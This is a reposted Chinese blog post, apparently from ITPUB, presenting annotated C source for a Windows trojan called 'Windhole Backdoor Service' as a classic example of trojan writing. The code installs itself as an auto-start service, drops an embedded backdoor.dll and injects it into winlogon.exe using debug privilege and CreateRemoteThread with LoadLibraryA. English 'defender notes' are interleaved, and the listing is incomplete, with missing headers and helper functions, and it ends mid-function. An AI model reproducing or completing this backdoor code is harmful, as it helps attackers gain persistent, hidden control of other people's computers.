寫木馬的經典：dll 插入系統程式的原始碼（轉）
程式碼不全，這裡只是主要的部分，附有詳細的註釋。
裡面涉及常用且重要的程式設計思路。
/*---------------------------------------------------------------------
//mysvr.c
//Coder: sjdf
//E-mail: sjdf1@163.com
//Create date: 2002.8.11
//Last modify date: 2003.10.28
//Test platform: Win2000 Adv Server + sp4
---------------------------------------------------------------------*/
//Header
#include "bkdlldata.h"
#include
// NOTE(review): the four header names were lost in transcription; the bare
// "#include" directives as shown will not preprocess.
#include
#include
#include
#include
//---------------------------------------------------------------------
//Global constant
// Fixed identifiers used by the installer and the worker thread below. For a
// defender these are the static artifacts this sample leaves: the service
// name / display name registered with the SCM, the self-copy placed in the
// system directory, the DLL dropped by MyWorkThread, and the process it is
// loaded into.
char SERVICENAME[9] = "windhole";                         // SCM service name (non-const; stored in main's SERVICE_TABLE_ENTRY)
const char DISPLAYNAME[33] = "Windhole Backdoor Service"; // service display name
const char SRVFILENAME[13] = "windhole.exe";              // file name of the self-copy in the system directory
const char BDRFILENAME[13] = "backdoor.dll";              // DLL written to disk by MyWorkThread and loaded into DESTPROC
const char DESTPROC[19] = "winlogon.exe";                 // process targeted by the remote LoadLibraryA thread
//---------------------------------------------------------------------
//Global variable
SERVICE_STATUS MyServiceStatus;              // status record reported to the SCM by MyServiceStart
SERVICE_STATUS_HANDLE MyServiceStatusHandle; // handle returned by RegisterServiceCtrlHandler
int WillStop = 0;                            // set to 1 on every exit path of MyWorkThread; not read anywhere in this listing
//---------------------------------------------------------------------
//Function declaration
int AddPrivilege(const char *Name);               // defined outside this listing
void MyServiceStart (int argc, char *argv[]);
void MyServiceCtrlHandler (DWORD opcode);         // defined outside this listing
// NOTE(review): "MyWrokThread" is a misspelling of MyWorkThread. Nothing
// references this name, and MyWorkThread is defined below before its caller
// in this listing, so this prototype is dead.
DWORD MyWrokThread(void);
DWORD ProcessToPID(const char *InputProcessName); // defined outside this listing
//---------------------------------------------------------------------
//Function definition
// Entry point. With "-service" as argv[1] it hands the process to the SCM
// dispatcher; otherwise it acts as the installer: copies itself into the
// system directory under SRVFILENAME, registers an auto-start service named
// SERVICENAME whose command line runs that copy with "-service", and starts it.
// Returns 0 after a normal dispatcher exit or once installation has been
// attempted, 1 when one of the early installation steps fails.
// Defender note: the persistence artifacts are the service registration
// (SERVICENAME / DISPLAYNAME, SERVICE_AUTO_START) and the SRVFILENAME copy in
// the system directory; OpenSCManager is requested with
// SC_MANAGER_CREATE_SERVICE, so installation needs an administrative context.
int main(int argc,char *argv[])
{
    //If the argument is "-service", run as a service
    if ((argc >= 2) && (!lstrcmp(argv[1],"-service")))
    {
        SERVICE_TABLE_ENTRY DispatchTable[] =
        {
            {SERVICENAME, (LPSERVICE_MAIN_FUNCTION)MyServiceStart},
            {NULL, NULL}
        };
        // Hands this thread to the SCM dispatcher; MyServiceStart is the ServiceMain.
        if (!StartServiceCtrlDispatcher( DispatchTable))
        {
            return 1;
        }
        return 0;
    }
    //Otherwise install the service automatically
    //Copy itself into the system directory
    char DestName[MAX_PATH + 1];
    char NowName[MAX_PATH + 1];
    ZeroMemory(DestName,MAX_PATH + 1);
    ZeroMemory(NowName,MAX_PATH + 1);
    if (!GetSystemDirectory(DestName,MAX_PATH))
    {
        printf("GetSystemDirectory() error = %d
Install failure!
",GetLastError());
        return 1;
    }
    // NOTE(review): the literal is empty as transcribed, so SRVFILENAME is
    // appended directly to the directory string.
    lstrcat(DestName,"");
    lstrcat(DestName,SRVFILENAME);
    // NowName = full path of the running executable.
    if (!GetModuleFileName(NULL,NowName,MAX_PATH))
    {
        printf("GetModuleFileName() error = %d
Install failure!
",GetLastError());
        return 1;
    }
    // bFailIfExists = 0: an existing file of the same name is overwritten.
    if (!CopyFile(NowName,DestName,0))
    {
        printf("CopyFile() error = %d
Install failure!
",GetLastError());
        return 1;
    }
    //Install the service
    SC_HANDLE newService, scm;
    //Connect to the SCM
    if (!(scm = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE)))
    {
        printf("OpenSCManager() error = %d
Install failure!
",GetLastError());
        return 1;
    }
    //When started as a service, add the "-service" argument
    // DestName is now the service command line: "<sysdir>windhole.exe -service".
    lstrcat(DestName," -service");
    // Own-process, auto-start service; no account is given, so the SCM's
    // default account (LocalSystem) applies.
    if (!(newService = CreateService(scm, SERVICENAME, DISPLAYNAME, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, DestName, NULL, NULL, NULL, NULL, NULL)))
    {
        // No early return here: the failure falls through to the handle
        // cleanup below (with newService == NULL) and main still returns 0.
        printf("CreateService() error = %d
Install failure!
",GetLastError());
    }
    else
    {
        printf("Install success!
");
        // Argument vector for StartService: one argument ("-service");
        // the trailing "" is not counted (dwNumServiceArgs is 1).
        char *pra[] = {"-service", ""};
        if (!StartService(newService,1,(const char **)pra))
        {
            printf("StartService() error = %d
Start service failure!
",GetLastError());
        }
        else
        {
            printf("Start service Success!
");
        }
    }
    CloseServiceHandle(newService);
    CloseServiceHandle(scm);
    return 0;
}
//---------------------------------------------------------------------
// Service worker thread, started by MyServiceStart. Writes the embedded DLL
// (data1..data5, presumably from bkdlldata.h) to BDRFILENAME, then loads it
// into DESTPROC with the CreateRemoteThread + LoadLibraryA technique.
// Sets WillStop = 1 on every exit path; returns 1 on any failure and 0 once
// the remote thread has been requested.
// Defender note: the observable sequence is SeDebugPrivilege being requested,
// OpenProcess on winlogon.exe with create-thread / VM-write rights, a
// WriteProcessMemory of a DLL path, and CreateRemoteThread with
// kernel32!LoadLibraryA as the start address — the pattern host-based
// monitoring generally classifies as DLL injection.
DWORD MyWorkThread(void)
{
    // Fixed 4 s delay before acting; the reason is not stated in the source.
    Sleep(4000);
    FILE *fp;
    // Relative path: the DLL is written to the service process's current
    // working directory, whatever that is at this point.
    if ((fp = fopen(BDRFILENAME,"wb")) == NULL)
    {
        WillStop = 1;
        return 1;
    }
    // data1..data5 are not declared in this listing; fwrite results are not checked.
    fwrite(data1,sizeof(data1),1,fp);
    fwrite(data2,sizeof(data2),1,fp);
    fwrite(data3,sizeof(data3),1,fp);
    fwrite(data4,sizeof(data4),1,fp);
    fwrite(data5,sizeof(data5),1,fp);
    fclose(fp);
    // Path handed to the remote LoadLibraryA: <system dir> + BDRFILENAME.
    // NOTE(review): this names the system directory, while the file above was
    // written with a relative path; the two only coincide if the service's
    // working directory is the system directory. GetSystemDirectory's result
    // is not checked here.
    char FullName[MAX_PATH + 1];
    ZeroMemory(FullName,MAX_PATH + 1);
    GetSystemDirectory(FullName,MAX_PATH);
    lstrcat(FullName,""); // empty literal as transcribed
    lstrcat(FullName,BDRFILENAME);
    //To open a system process, debug privilege must be acquired first
    // (AddPrivilege is defined outside this listing; its result is not checked).
    AddPrivilege(SE_DEBUG_NAME);
    HANDLE hRemoteProcess = NULL;
    // ProcessToPID is defined outside this listing; its result is passed to
    // OpenProcess without validation.
    DWORD Pid = ProcessToPID(DESTPROC);
    if ((hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //allow creating a remote thread
        PROCESS_VM_OPERATION | //allow remote VM operations
        PROCESS_VM_WRITE | //allow remote VM write
        PROCESS_VM_READ, //allow remote VM read
        0, Pid)) == NULL)
    {
        WillStop = 1;
        return 1;
    }
    char *pDllName = NULL;
    // Reserve lstrlen(FullName) + 1 bytes in the target for the DLL path.
    if ((pDllName = (char *)VirtualAllocEx( hRemoteProcess, NULL, lstrlen(FullName) + 1, MEM_COMMIT, PAGE_READWRITE)) == NULL)
    {
        CloseHandle(hRemoteProcess);
        WillStop = 1;
        return 1;
    }
    //Use WriteProcessMemory to copy the DLL path into the remote process's memory
    // (lstrlen(FullName) bytes, i.e. without the terminator, into the region
    // of lstrlen + 1 bytes allocated above).
    if (WriteProcessMemory(hRemoteProcess, pDllName, FullName, lstrlen(FullName), NULL) == 0)
    {
        VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);
        CloseHandle(hRemoteProcess);
        WillStop = 1;
        return 1;
    }
    //Compute the entry address of LoadLibraryA
    // The address is resolved in this process and reused as the thread start
    // address in the target process.
    PTHREAD_START_ROUTINE pfnStartAddr = NULL;
    if ((pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress( GetModuleHandle(TEXT("kernel32")), "LoadLibraryA")) == NULL)
    {
        VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);
        CloseHandle(hRemoteProcess);
        WillStop = 1;
        return 1;
    }
    DWORD ThreadId = 0;
    // Thread in DESTPROC whose start routine is LoadLibraryA and whose
    // argument is the DLL path, so the target loads BDRFILENAME. The returned
    // thread handle is neither checked nor closed.
    CreateRemoteThread(hRemoteProcess, //the remote process being injected into
        NULL, 0,
        pfnStartAddr, //entry address of LoadLibraryA
        pDllName, 0, &ThreadId);
    CloseHandle(hRemoteProcess);
    WillStop = 1;
    return 0;
}
//---------------------------------------------------------------------
// ServiceMain registered through DispatchTable in main(). Registers the
// control handler, reports SERVICE_START_PENDING and spawns MyWorkThread.
// The body continues past the end of this listing.
void MyServiceStart (int argc, char *argv[])
{
    if
(!(MyServiceStatusHandle = RegisterServiceCtrlHandler(SERVICENAME,(LPHANDLER_FUNCTION)MyServiceCtrlHandler))) { return; } MyServiceStatus.dwServiceType = SERVICE_WIN32; MyServiceStatus.dwCurrentState = SERVICE_START_PENDING; MyServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE; MyServiceStatus.dwWin32ExitCode = 0; MyServiceStatus.dwServiceSpecificExitCode = 0; MyServiceStatus.dwCheckPoint = 0; MyServiceStatus.dwWaitHint = 0; if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus)) { return; } DWORD Threadid; // Initialization code goes here. Handle error condition if (!CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)MyWorkThread,NULL, 0, &Threadid)) { MyServiceStatus.dwCurrentState = SERVICE_STOPPED; MyServiceStatus.dwCheckPoint = 0; MyServiceStatus.dwWaitHint = 0; MyServiceStatus.dwWin32ExitCode = GetLastError(); MyServiceStatus.dwServiceSpecificExitCode = GetLastError();
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10763080/viewspace-970138/,如需轉載,請註明出處,否則將追究法律責任。